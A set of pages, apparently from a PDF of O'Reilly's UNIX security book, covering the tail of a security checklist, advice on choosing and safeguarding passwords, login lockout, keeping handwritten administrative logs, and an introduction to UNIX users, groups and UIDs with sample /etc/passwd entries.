A.1.1.23 Chapter 24: Discovering a Break-in<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Plan ahead: have response plans designed and rehearsed.<br />

If a break-in occurs, don't panic!<br />

Start a diary and/or script file as soon as you discover or suspect a break-in. Note and timestamp<br />

everything you discover and do.<br />

Run hardcopies of files showing changes and tracing activity. Initial and time-stamp these copies.<br />

Run machine status-checking programs regularly to watch for unusual activity: ps, w, vmstat, etc.<br />

If a break-in occurs, consider making a dump of the system to backup media before correcting<br />

anything.<br />

Carefully examine the system after a break-in. See the chapter text for specifics - there is too much<br />

detail to list here. Specifically, be certain that you restore the system to a known, good state.<br />

Carefully check backups and logs to determine if this is a single occurrence or is related to a set of<br />

incidents.<br />

A.1.1.24 Chapter 25: Denial of Service Attacks and Solutions<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

If user quotas are available on your system, enable them.<br />

Configure appropriate process and user limits on your system.<br />

Don't test new software while running as root.<br />

Install a firewall to prevent network problems.<br />

Educate your users on polite methods of sharing system resources.<br />

Run long-running tasks in the background, setting the nice to a positive value.<br />

Configure disk partitions to have sufficient inodes and storage.<br />

Make sure that you have appropriate swap space configured.<br />

Monitor disk usage and encourage users to archive and delete old files.<br />

Consider investing in a network monitor appropriate for your network. Have a spare network<br />

connection available, if you need it.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (18 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

Keep available an up-to-date paper list of low-level network addresses (e.g., Ethernet addresses),<br />

IP addresses, and machine names.<br />

Ensure good physical security for all network cables and connectors.<br />

A.1.1.25 Chapter 26: Computer <strong>Sec</strong>urity and U.S. Law<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Consult with your legal counsel to determine legal options and liability in the event of a security<br />

incident.<br />

Consult with your insurance carrier to determine if your insurance covers loss from break-ins.<br />

Determine if your insurance covers business interruption during an investigation. Also determine if<br />

you will be required to institute criminal or civil action to recover on your insurance.<br />

Replace any "welcome" messages with warnings against unauthorized use.<br />

Put explicit copyright and/or proprietary property notices in code start-up screens and source code.<br />

Formally register copyrights on your locally developed code and databases.<br />

Keep your backups separate from your machine.<br />

Keep written records of your actions when investigating an incident. Time-stamp and initial media,<br />

printouts, and other materials as you proceed.<br />

Develop contingency plans and response plans in advance of difficulties.<br />

Define, in writing, levels of user access and responsibility. Have all users provide a signature<br />

noting their understanding of and agreement to such a statement. Include an explicit statement<br />

about the return of manuals, printouts, and other information upon user departure.<br />

Develop contacts with your local law-enforcement personnel.<br />

Do not be unduly hesitant about reporting a computer crime and involving law-enforcement<br />

personnel.<br />

If called upon to help in an investigation, request a signed statement by a judge requesting (or<br />

directing) your "expert" assistance. Recommend a disinterested third party to act as an expert, if<br />

possible.<br />

Expand your professional training and contacts by attending security training sessions or<br />

conferences. Consider joining security-related organizations.<br />

Be aware of other liability concerns.<br />

Restrict access to cryptographic software from the network.<br />

Restrict or prohibit access to material that could lead to legal difficulties. This includes<br />

copyrighted material, pornographic material, trade secrets, etc.<br />

Make sure that users understand copyright and license restrictions on commercial software,<br />

images, and sound files.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (19 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

●<br />

●<br />

●<br />

Prohibit or restrict access to Usenet from organizational machines. Consider coupling this to<br />

provision of personal accounts with an independent service provider.<br />

Make your users aware of the dangers of electronic harassment or defamation.<br />

Make certain that your legal counsel is consulted before you provide locally developed software to<br />

others outside your organization.<br />

A.1.1.26 Chapter 27: Who Do You Trust?<br />

●<br />

●<br />

●<br />

●<br />

Read the chapter. Develop a healthy sense of paranoia.<br />

Protest when vendors attempt to sell you products advertised with "hacker challenges" instead of<br />

more reliable proof of good design and testing.<br />

Make your vendor aware of your concerns about security, adequate testing, and fixing security<br />

bugs in a timely fashion.<br />

Buy another 1000 copies of this book for all your friends and acquaintances. The copies will make<br />

you intelligent, attractive, and incredibly popular. Trust us on this.<br />

A.1.1.27 Appendix B: Important Files<br />

●<br />

●<br />

Become familiar with the important files on your system.<br />

Understand why SUID/SGID files have those permissions.<br />

A.1.1.28 Appendix C: <strong>UNIX</strong> Processes<br />

●<br />

●<br />

Understand how processes work on your system.<br />

Understand the commands that are available to manipulate processes on your system.<br />

A.1.1.29 Appendix D: Paper Sources<br />

●<br />

Paper Sources<br />

A.1.1.30 Appendix E: Electronic Resources<br />

●<br />

Electronic Resources<br />

A.1.1.31 Appendix F: Organizations<br />

●<br />

●<br />

●<br />

●<br />

Learn more about security.<br />

Explore other resources concerning security, <strong>UNIX</strong>, and the <strong>Internet</strong>.<br />

Monitor newsgroups, mailing lists, and other resources that will help you stay current on threats<br />

and countermeasures.<br />

Explore professional opportunities that enable you to network with other professionals, and add to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (20 of 21) [2002-04-12 10:44:34]


[Appendix A] <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

your knowledge and experience.<br />

A.1.1.32 Appendix G: Table of IP Services<br />

●<br />

Read the table and add your own site notes indicating the services you do and do not wish to<br />

support.<br />

VII. Appendixes B. Important Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appa_01.htm (21 of 21) [2002-04-12 10:44:34]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

Chapter 3<br />

Users and Passwords<br />

3.6 The Care and Feeding of Passwords<br />

Although passwords are the most important element of computer security, users often receive only<br />

cursory instructions about selecting them.<br />

If you are a user, be aware that by picking a bad password - or by revealing your password to an<br />

untrustworthy individual - you are potentially compromising your entire computer's security. If you are a<br />

system administrator, be sure that all of your users are familiar with the issues raised in this section.<br />

3.6.1 Bad Passwords: Open Doors<br />

A bad password is any password that is easily guessed.<br />

In the movie Real Genius, a computer recluse named Laszlo Hollyfeld breaks into a top-secret military<br />

computer over the telephone by guessing passwords. Laszlo starts by typing the password AAAAAA, then<br />

trying AAAAAB, then AAAAAC, and so on, until he finally finds the password that matches.<br />

Real-life computer crackers are far more sophisticated. Instead of typing each password by hand,<br />

crackers use their computers to make phone calls (or opening network connections) and try the<br />

passwords, automatically retrying when they are disconnected. Instead of trying every combination of<br />

letters, starting with AAAAAA (or whatever), crackers use hit lists of common passwords such as wizard<br />

or demo. Even a modest home computer with a good password guessing program can try thousands of<br />

passwords in less than a day's time. Some hit lists used by crackers are several hundred thousand words<br />

in length.[8] Therefore, a password that anybody else might use for his own password is probably a bad<br />

choice for you.<br />

[8] In contrast, if you were to program a home computer to try all 6-letter combinations<br />

from AAAAAA to ZZZZZZ, it would have to try 308,915,776 different passwords. Guessing<br />

one password per second, that would require nearly ten years.<br />

What's a popular and bad password? Some examples are your name, your partner's name, or your parents'<br />

names. Other bad passwords are these names backwards or followed by a single digit. Short passwords<br />

are also bad, because there are fewer of them: they are, therefore, more easily guessed. Especially bad are<br />

"magic words" from computer games, such as xyzzy. They look secret and unguessable, but in fact are<br />

widely known. Other bad choices include phone numbers, characters from your favorite movies or<br />

books, local landmark names, favorite drinks, or famous computer scientists (see the sidebar later in this<br />

chapter for still more bad choices). These words backwards or capitalized are also weak. Replacing the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (1 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

letter "l" (lowercase "L") with "1" (numeral one), or "E" with "3," adding a digit to either end, or other<br />

simple modifications of common words are also weak. Words in other languages are no better.<br />

Dictionaries for dozens of languages are available for download on the <strong>Internet</strong> and dozens of bulletin<br />

board systems.<br />

Many versions of <strong>UNIX</strong> make a minimal attempt to prevent users from picking bad passwords. For<br />

example, under some versions of <strong>UNIX</strong>, if you attempt to pick a password with fewer than six letters that<br />

are all of the same case, the passwd program will ask the user to "Please use a longer password." After<br />

three tries, however, the program relents and lets the user pick a short one. Better versions allow the<br />

administrator to require a minimum number of letters, a requirement for nonalphabetic characters, and<br />

other restrictions. However, some administrators turn these requirements off because users complain<br />

about them; this is a bad idea. Users will complain more loudly if their computers are broken into.<br />

Bad Passwords<br />

When picking passwords, avoid the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Your name, spouse's name, or partner's name.<br />

Your pet's name or your child's name.<br />

Names of close friends or coworkers.<br />

Names of your favorite fantasy characters.<br />

Your boss's name.<br />

Anybody's name.<br />

The name of the operating system you're using.<br />

Information in the GECOS field of your passwd file entry.<br />

The hostname of your computer.<br />

Your phone number or your license plate number.<br />

Any part of your social security number.<br />

Anybody's birth date.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (2 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Other information easily obtained about you (e.g., address, alma mater).<br />

Words such as wizard, guru, gandalf, and so on.<br />

Any username on the computer in any form (as is, capitalized, doubled, etc.).<br />

A word in the English dictionary or in a foreign dictionary.<br />

Place names or any proper nouns.<br />

Passwords of all the same letter.<br />

Simple patterns of letters on the keyboard, like qwerty.<br />

Any of the above spelled backwards.<br />

Any of the above followed or prepended by a single digit.<br />

3.6.2 Smoking Joes<br />

Surprisingly, experts believe that a significant percentage of all computers without password content<br />

controls contain at least one account where the username and the password are the same. Such accounts<br />

are often called "Joes." Joe accounts are easy for crackers to find and trivial to penetrate. Most computer<br />

crackers can find an entry point into almost any system simply by checking every account to see whether<br />

it is a Joe account. This is one reason why it is dangerous for your computer to make a list of all of the<br />

valid usernames available to the outside world.<br />

3.6.3 Good Passwords: Locked Doors<br />

Good passwords are passwords that are difficult to guess. The best passwords are difficult to guess<br />

because they:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Have both uppercase and lowercase letters.<br />

Have digits and/or punctuation characters as well as letters.<br />

May include some control characters and/or spaces.<br />

Are easy to remember, so they do not have to be written down.<br />

Are seven or eight characters long.<br />

Can be typed quickly, so somebody cannot determine what you type by watching over your shoulder.<br />

It's easy to pick a good password. Here are some suggestions:<br />

●<br />

●<br />

Take two short words and combine them with a special character or a number, like robot4my or<br />

eye-con.<br />

Put together an acronym that's special to you, like Notfsw (None Of This Fancy Stuff Works),<br />

auPEGC (All <strong>UNIX</strong> programmers eat green cheese), or Ttl*Hiww (Twinkle, twinkle, little star.<br />

How I wonder what...).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (3 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

Of course, robot4my, eye-con, Notfsw, Ttl*Hiww and auPEGC are now all bad passwords because<br />

they've been printed here.<br />

Number of Passwords<br />

If you exclude a few of the control characters that should not be used in a password, it is still possible to<br />

create more than 43,000,000,000,000,000 unique passwords in standard <strong>UNIX</strong>.<br />

Combining dictionaries from 10 different major languages, plus those words reversed, capitalized, with a<br />

trailing digit appended, and otherwise slightly modified results in less than 5,000,000 words. Adding a<br />

few thousand names and words from popular culture hardly changes that.<br />

From this, we can see that users who pick weak passwords are making it easy for attackers - they reduce<br />

the search space to less than .0000000012% of the possible passwords!<br />

One study of passwords chosen in an unconstrained environment[9] revealed that users chose passwords<br />

with control characters only 1.4% of the time, and punctuation and space characters less than 6% of the<br />

time. All of the characters !@#$%^&*()_-+=[]|\;:"?/,.`~' can be used in passwords too; although, some<br />

systems may treat the "\", "#", and "@" symbols as escape (literal), erase, and kill, respectively. (See the<br />

footnote to the earlier sidebar entitled "Forcing a Change of Password" for a list of the control characters<br />

that should not be included in a password.)<br />

[9] See the reference to "Observing Reusable Password Choices" in Appendix D, Paper<br />

Sources.<br />

Next time one of your users complains because of the password selection restrictions you have in place<br />

and proclaims, "I can't think of any password that isn't rejected by the program!", you might show him<br />

this page.<br />

3.6.4 Passwords on Multiple Machines<br />

If you have several computer accounts, you may wish to have the same password on every machine, so<br />

you have less you need to remember. However, if you have the same password on many machines and<br />

one of those machines is compromised, all of your accounts are compromised. One common approach<br />

used by people with accounts on many machines is to have a base password that can be modified for<br />

each different machine. For example, your base password might be kxyzzy followed by the first letter of<br />

the name of the computer you're using. On a computer named athena your password would be kxyzzya,<br />

while on a computer named ems your password would be kxyzzye. (Don't, of course, use exactly this<br />

method of varying your passwords.)<br />

3.6.5 Writing Down Passwords<br />

There is a tired story about a high school student who broke into his school's academic computer and<br />

changed his grades; he did this by walking into the school's office, looking at the academic officer's<br />

terminal, and writing down the telephone number, username, and password that were printed on a Post-It<br />

note.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (4 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

Unfortunately, the story is true - hundreds of times over.<br />

Users are admonished to "never write down your password." The reason is simple enough: if you write<br />

down your password, somebody else can find it and use it to break into your computer. A password that<br />

is memorized is more secure than the same password written down, simply because there is less<br />

opportunity for other people to learn it. On the other hand, a password that must be written down to be<br />

remembered is quite likely a password that is not going to be guessed easily. If you write your password<br />

on something kept in your wallet, the chances of somebody who steals your wallet using the password to<br />

break into your computer account are remote indeed.[10]<br />

[10] Unless, of course, you happen to be an important person, and your wallet is stolen or<br />

rifled as part of an elaborate plot. In their book Cyberpunks, authors John Markoff and Katie<br />

Hafner describe a woman called "Susan Thunder" who broke into military computers by<br />

doing just that: she would pick up officers at bars and go home with them. Later that night,<br />

while the officer was sleeping, Thunder would get up, go through the man's wallet, and look<br />

for telephone numbers, usernames, and passwords.<br />

If you must write down your password, then at least follow a few precautions:<br />

●<br />

●<br />

●<br />

●<br />

When you write it down, don't identify your password as being a password.<br />

Don't include the name of the account, network name, or the phone number of the computer on the<br />

same piece of paper as your password.<br />

Don't attach the password to your terminal, keyboard, or any part of your computer.<br />

Don't write your actual password. Instead, disguise it, by mixing in other characters or by<br />

scrambling the written version of the password in a way that you can remember. For example, if<br />

your password is "Iluvfred", you might write "fredIluv" or "vfredxyIu" or perhaps "Last week, I<br />

lost Uncle Vernon's `fried rice & eggplant delight' recipe - remember to call him after 3 p.m." - to<br />

throw off a potential wallet-snatcher.[11]<br />

[11] We hope that last one required some thought. The 3 p.m. means to start with the<br />

third word and take the first letter of every word. With some thought, you can come<br />

up with something equally obscure that you will remember.<br />

Here are some other things to avoid:<br />

●<br />

●<br />

●<br />

Don't record a password online (in a file, in a database, or in an email message), unless the<br />

password is encrypted.<br />

Likewise, never send a password to another user via electronic mail. In The Cuckoo's Egg, Cliff<br />

Stoll tells of how a single intruder broke into system after system by searching for the word<br />

"password" in text files and electronic mail messages. With this simple trick, the intruder learned<br />

of the passwords of many accounts on many different computers across the country.<br />

Don't use your login password as the password of application programs. For instance, don't use<br />

your login password as your password to an on-line MUD (multi-user dungeon) game or for a<br />

World Wide Web server account. The passwords in those applications are controlled by others and<br />

may be visible to the wrong people.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (5 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.6 The Care and Feeding of Passwords<br />

●<br />

Don't use the same password for different computers managed by different organizations. If you<br />

do, and an attacker learns the password for one of your accounts, all will be compromised.<br />

This last "don't" is very difficult to follow in practice.<br />

Using Passwords in More Than One Place<br />

Alec Muffett, the author of the Crack program (discussed in Chapter 8), related an entertaining story to<br />

us about the reuse of passwords, in more than one place, which we paraphrase here.<br />

A student friend of Alec's (call him Bob) spent a co-op year at a major computer company site. During<br />

his vacations and on holidays, he'd come back to school and play AberMUD (a network-based game) on<br />

Alec's computer. One of Bob's responsibilities at the company involved system management. The<br />

company was concerned about security, so all passwords were random strings of letters with no sensible<br />

pattern or order.<br />

One day, Alec fed the AberMUD passwords into his development version of the Crack program as a<br />

dictionary, because they were stored on his machine as plain text. He then ran this file against his system<br />

user-password file, and found a few student account passwords. He had the students change their<br />

passwords, and he then forgot about the matter.<br />

Some time later, Alec posted a revised version of the Crack program and associated files to the Usenet.<br />

They ended up in one of the sources newsgroups and were distributed quite widely. Eventually, after a<br />

trip of thousands of miles around the world, they came to Bob's company. Bob, being a concerned<br />

administrator, decided to download the files and check them against his company's passwords. Imagine<br />

Bob's shock and horror when the widely distributed Crack promptly churned out a match for his<br />

randomly chosen, super-secret root password!<br />

The moral of the story is that you should teach your users to never use their account passwords in other<br />

applications or on other systems outside the same administrative domain. They never know when those<br />

passwords might come back to haunt them! (And programs like AberMUD should be modified to store<br />

passwords encrypted with one-way hash functions.)<br />

3.5 Verifying Your New<br />

Password<br />

3.7 One-Time Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_06.htm (6 of 6) [2002-04-12 10:44:35]


[Chapter 3] 3.3 Entering Your Password<br />

Chapter 3<br />

Users and Passwords<br />

3.3 Entering Your Password<br />

Telling the computer your password is the way that you prove to the computer that you are you. In<br />

classical security parlance, your password is what the computer uses to authenticate your identity (two<br />

words that have a lot of significance to security gurus, but generally mean the same thing that they do to<br />

ordinary people).<br />

When you log in, you tell the computer who you are by typing your username at the login prompt. You<br />

then type your password (in response to the password prompt) to prove that you are who you claim to be.<br />

For example:<br />

login: sarah<br />

password: tuna4fis<br />

As we mentioned above, <strong>UNIX</strong> does not display your password when you type it.<br />

If the password that you supply with your username corresponds to the one on file, <strong>UNIX</strong> logs you in and<br />

gives you full access to all of your files, commands, and devices. If either the password or the username<br />

does not match, <strong>UNIX</strong> does not log you in.<br />

On some versions of <strong>UNIX</strong>, if somebody tries to log into your account and supplies an invalid password<br />

several times in succession, your account will be locked. A locked account can be unlocked only by the<br />

system administrator. Locking has two functions:<br />

1.<br />

2.<br />

It protects the system from someone who persists in trying to guess a password; before they can<br />

guess the correct password, the account is shut down.<br />

It notifies you that someone has been trying to break into your account.<br />

If you find yourself locked out of your account, you should contact your system administrator and get<br />

your password changed to something new. Don't change your password back to what it was before you<br />

were locked out.<br />

NOTE: The automatic lockout feature can prevent unauthorized use, but it can also be used<br />

to conduct denial of service attacks, or by an attacker to lock selected users out of the<br />

system so as to prevent discovery of his actions. A practical joker can use it to annoy fellow<br />

employees or students. And you can lock yourself out if you try to log in too many times<br />

before you've had your morning coffee. In our experience, indefinite automatic lockouts<br />

aren't particularly helpful. A much better method is to employ an increasing delay<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_03.htm (1 of 2) [2002-04-12 10:44:35]


[Chapter 3] 3.3 Entering Your Password<br />

mechanism in the login. After a fixed number of unsuccessful logins, an increasing delay<br />

can be inserted between each successive prompt. Implementing such delays in a network<br />

environment requires maintaining a record of failed login attempts, so that the delay cannot<br />

be circumvented by an attacker who merely disconnects from the target machine and<br />

reconnects.<br />

AIX version 4 can be configured for increased delays at successive login prompts by editing<br />

the logindelay variable in the file /etc/security/login.cfg. AIX also supports automatic<br />

locking of terminals with automatic reenablement after some time with the logindisable and<br />

loginreenable attributes in the same file.<br />

The Linux operating system gives the user 10 chances to log in, with an increasing delay<br />

after each attempt. This achieves essentially the same goal as a lockout (preventing someone<br />

from trying lots of passwords within a short amount of time), but it limits denial of service<br />

attacks as well.<br />

3.2 Passwords 3.4 Changing Your Password<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_03.htm (2 of 2) [2002-04-12 10:44:35]


[Chapter 10] 10.7 Handwritten Logs<br />

10.7 Handwritten Logs<br />

Chapter 10<br />

Auditing and Logging<br />

Another type of logging that can help you with security is not done by the computer at all; it is done by<br />

you and your staff. Keep a log book that records your day's activities. Log books should be kept on paper<br />

in a physically secure location. Because you keep them on paper, they cannot be altered by someone<br />

hacking into your computer even as superuser. They will provide a nearly tamper-proof record of<br />

important information.<br />

Handwritten logs have several advantages over online logs:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

They can record many different kinds of information. For example, your computer will not record<br />

a suspicious telephone call or a bomb threat, but you can (and should) record these occurrences in<br />

your log book.<br />

If the systems are down, you can still access your paper logs. (Thus, this is a good place to keep a<br />

copy of account numbers and important phone numbers for field service, service contacts, and<br />

your own key personnel.)<br />

If disaster befalls your disks, you can recreate some vital information from paper, if it is in the log<br />

book.<br />

If you keep the log book as a matter of course, and you enter into it printed copies of your<br />

exception logs, such information might be more likely to be accepted into court proceedings as<br />

business records. This advantage is important if you are in a situation where you need to pursue<br />

criminal or civil legal action.<br />

Juries are more easily convinced that paper logs are authentic, as opposed to computer logs.<br />

Having copies of significant information in the log book keeps you from having to search all the<br />

disks on all your workstations for some selected information.<br />

If all your other tools fail or might have been compromised, holding an old printout and a new<br />

printout of the same file together and up to a bright light, may be a quick way to reveal changes.<br />

Think of your log book as a laboratory notebook, except the laboratory is your own computer center.<br />

Each page should be numbered. You should not rip pages out of your book. Write in ink, not pencil. If<br />

you need to cross something out, draw a single line, but do not make the text that you are scratching out<br />

unreadable. Keep your old log books.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_07.htm (1 of 4) [2002-04-12 10:44:35]


[Chapter 10] 10.7 Handwritten Logs<br />

The biggest problem with log books is the amount of time you need to keep them up to date. These are<br />

not items that can be automated with a shell script. Unfortunately, this time requirement is the biggest<br />

reason why many administrators are reluctant to keep logs - especially at a site with hundreds (or<br />

thousands) of machines, each of which might require its own log book. We suggest you try to be creative<br />

and think of some way to balance the need for good records against the drudgery of keeping multiple<br />

books up to date. Compressing information, and keeping logs for each cluster of machines is one way to<br />

reduce the overhead while receiving (nearly) the same benefit.<br />

There are basically two kinds of log books: per-site logs and per-machine logs. We'll outline the kinds of<br />

material you might want to keep in each type. Be creative, though, and don't limit yourself to what we<br />

suggest here.<br />

10.7.1 Per-Site Logs<br />

In a per-site log book, you want to keep information that would be of use across all your machines and<br />

throughout your operations. The information can be further divided into exception and activity reports,<br />

and informational material.<br />

10.7.1.1 Exception and activity reports<br />

These reports hold such information as the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Time/date/duration of power outages; over time, this may help you justify uninterruptible power<br />

supplies, or to trace a cause of frequent problems<br />

Servicing and testing of alarm systems<br />

Triggering of alarm systems<br />

Servicing and testing of fire suppression systems<br />

Visits by service personnel, including the phone company<br />

Dates of employment and termination of employees with privileged access (or with any access)<br />

10.7.1.2 Informational material<br />

This material contains such information as the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Contact information for important personnel, including corporate counsel, law enforcement, field<br />

service, and others who might be involved in any form of incident<br />

Copies of purchase orders, receipts, and licenses for all software installed on your systems<br />

(invaluable if you are one of the targets of a Software Publishers Association audit)<br />

Serial numbers for all significant equipment on the premises<br />

All machine MAC-level addresses (e.g., Ethernet addresses) with corresponding IP (or other<br />

protocol) numbers<br />

Time and circumstances of formal bug reports made to the vendor<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_07.htm (2 of 4) [2002-04-12 10:44:35]


[Chapter 10] 10.7 Handwritten Logs<br />

●<br />

●<br />

●<br />

Phone numbers connected to your computers for dial-in/dial-out<br />

Paper copy of the configuration of any routers, firewalls, or other network devices not associated<br />

with a single machine<br />

Paper copy of a list of disk configurations, SCSI geometries, and partition tables and information.<br />

10.7.2 Per-Machine Logs<br />

Each machine should also have a log book associated with it. Information in these logs, too, can be<br />

divided into exception and activity reports, and informational material:<br />

10.7.2.1 Exception and activity reports<br />

These reports hold such information as the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Times and dates of any halts or crashes, including information on any special measures for system<br />

recovery<br />

Times, dates, and purposes of any downtimes<br />

Data associated with any unusual occurrence, such as network behavior out of the ordinary, or a<br />

disk filling up without obvious cause<br />

Time and UID of any accounts created, disabled, or deleted, including the account owner, the user<br />

name, and the reason for the action.<br />

Instances of changing passwords for users<br />

Times and levels of backups and restores along with a count of how many times each backup tape<br />

has been used<br />

Times, dates, and circumstances of software installation or upgrades<br />

Times and circumstances of any maintenance activity<br />

10.7.2.2 Informational material<br />

This material contains such information as the following:<br />

●<br />

●<br />

●<br />

●<br />

Copy of current configuration files, including passwd, group, and inetd.conf. (update these copies<br />

periodically, or as the files change)<br />

List of patches applied from the vendor, software revision numbers, and other identifying<br />

information<br />

Configuration information for any third-party software installed on the machine<br />

"ls -l " listing of any setuid/setgid files on the system, and of all device files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_07.htm (3 of 4) [2002-04-12 10:44:35]


[Chapter 10] 10.7 Handwritten Logs<br />

10.6 Swatch: A Log File Tool 10.8 Managing Log Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_07.htm (4 of 4) [2002-04-12 10:44:35]


[Chapter 4] Users, Groups, and the Superuser<br />

Chapter 4<br />

4. Users, Groups, and the Superuser<br />

Contents:<br />

Users and Groups<br />

Special Usernames<br />

su: Changing Who You Claim to Be<br />

Summary<br />

In Chapter 3, Users and Passwords, we explained that every <strong>UNIX</strong> user has a user name to define an account.<br />

In this chapter, we'll describe how the operating system views users, and we'll discuss how accounts and<br />

groups are used to define access privileges for users. We will also discuss how you may assume the identity of<br />

another user or group so as to temporarily use their access rights.<br />

4.1 Users and Groups<br />

Although every <strong>UNIX</strong> user has a username of up to eight characters long, inside the computer <strong>UNIX</strong><br />

represents each user by a single number: the user identifier (UID). Usually, the <strong>UNIX</strong> system administrator<br />

gives every user on the computer a different UID.<br />

<strong>UNIX</strong> also uses special usernames for a variety of system functions. As with usernames associated with human<br />

users, system usernames usually have their own UIDS as well. Here are some common "users" on various<br />

versions of <strong>UNIX</strong>:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

root, the superuser, which performs accounting and low-level system functions.<br />

daemon or sys, which handles some aspects of the network. This username is also associated with other<br />

utility systems, such as the print spoolers, on some versions of <strong>UNIX</strong>.<br />

agent, which handles aspects of electronic mail. On many systems, agent has the same UID as daemon.<br />

guest, which is used for site visitors to access the system.<br />

ftp, which is used for anonymous FTP access.<br />

uucp, which manages the UUCP system.<br />

news, which is used for Usenet news.<br />

lp, which is used for the printer system.[1]<br />

[1] lp stands for line printer, although these days most people seem to be using laser<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_01.htm (1 of 7) [2002-04-12 10:44:36]


[Chapter 4] Users, Groups, and the Superuser<br />

●<br />

printers.<br />

nobody, which is a user that owns no files and is sometimes used as a default user for unprivileged<br />

operations.<br />

Here is an example of an /etc/passwd file containing these system users:<br />

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh<br />

nobody:*:60001:60001::/tmp:<br />

agent:*:1:1::/tmp:<br />

daemon:*:1:1::/tmp:<br />

ftp:*:3:3:FTP User:/usr/spool/ftp:<br />

uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico<br />

news:*:6:6::/usr/spool/news:/bin/csh<br />

Notice that most of these accounts do not have "people names," and that all except root have a password field<br />

of *. This prevents people from logging into these accounts from the <strong>UNIX</strong> login: prompt, as we'll discuss<br />

later.[2]<br />

[2] This does not prevent people from logging in if there are trusted hosts/users on that account;<br />

we'll describe these later in the book.<br />

NOTE: There is nothing magical about these particular account names. All <strong>UNIX</strong> privileges are<br />

determined by the UID (and sometimes the group ID, or GID), and not directly by the account<br />

name. Thus, an account with name root and UID 1005 would have no special privileges, but an<br />

account named mortimer with UID 0 would be a superuser. In general, you should avoid creating<br />

users with a UID of 0 other than root, and you should avoid using the name root for a regular user<br />

account. In this book, we will use the terms "root" and "superuser" interchangeably.<br />

4.1.1 User Identifiers (UIDs)<br />

UIDs are historically unsigned 16-bit integers, which means they can range from 0 to 65535. UIDs between 0<br />

and 9 are typically used for system functions; UIDs for humans usually begin at 20 or 100. Some versions of<br />

<strong>UNIX</strong> are beginning to support 32-bit UIDs. In a few older versions of <strong>UNIX</strong>, UIDs are signed 16-bit integers,<br />

usually ranging from -32768 to 32767.<br />

<strong>UNIX</strong> keeps the mapping between usernames and UIDs in the file /etc/passwd. Each user's UID is stored in the<br />

field after the one containing the user's encrypted password. For example, consider the sample /etc/passwd<br />

entry presented in Chapter 3:<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

In this example, Rachel's username is rachel and her UID is 181.<br />

The UID is the actual information that the operating system uses to identify the user; usernames are provided<br />

merely as a convenience for humans. If two users are assigned the same UID, <strong>UNIX</strong> views them as the same<br />

user, even if they have different usernames and passwords. Two users with the same UID can freely read and<br />

